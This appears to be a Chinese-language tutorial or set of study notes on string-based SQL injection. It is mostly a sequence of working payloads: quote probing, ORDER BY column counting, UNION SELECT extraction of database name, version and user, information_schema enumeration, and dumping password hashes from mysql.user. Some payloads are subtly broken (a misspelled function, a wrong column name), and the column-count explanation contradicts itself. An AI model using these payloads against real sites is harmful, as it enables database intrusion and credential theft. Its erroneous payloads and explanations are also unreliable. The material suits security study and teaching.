字符型注入

字符型注入就是用户在前端的输入未经过过滤或处理用户输入的字符串插入到后端数据库查询语句，后端的SQL查询语句将参数值用引号或者括号等特殊符号包裹起来，改变了原有的查询语句，从而形成字符型注入。

具体操作

1、判断是否存在注入点

？id=1 and 1=1还是?id = 1 and 1=2都能够正常显示出页面，所以确定他是字符型注入

？id=1' and 1=1还是?id = 1' and 1=2都能够正常显示出页面，所以确定他是字符型注入

？id=1" and 1=1还是?id = 1" and 1=2都能够正常显示出页面，所以确定他是字符型注入

2、判断字段数order by N

正常的查询列数的语句为

1' order by 1--+

1' order by 2--+

判断出字段数为：2

SELECT * FROM users ORDER BY 4 DESC

order by 后边跟的是SQL语句查询的列数的数字 如果超过了 就报错 Unknown column '4' in 'order clause'
重点：order by是对数据库中返回结果的排序，而不是对数据库的表里面列的排序。
order by 1的含义是排序第一个栏位，order by 2排序第二个栏位。

当order by 3时排序第三个栏位回显正常，而order by 4回显错误，可以判断出当前sql语句向该表查询了三个字段

3、找出可以回显的字段

?id=1' union select 1，2--+；1,2是一个占位回显，判断当前那个列可以回显出内容

4、查看当前数据库、数据库用户以及数据库版本

-1'union select 1,databse()--+

-1' union select 1,version()--+

-1' union  select 1,user()--+

5、获取数据库的表名

-1'    union  select 1,group_concat(table_name) from  information_schema.tables where table_name=databse()--+

6、获取表的字段名

-1'    union  select 1,group_concat(column_name) from  information_schema.columns where tables_name=users--+
7、猜root用户

-1' union select 1,group_concat(user,authentication_string) from mysql.user--+

重点：为什么要用mysql.user因为user表可能可能有多个，所以要指定数据库名。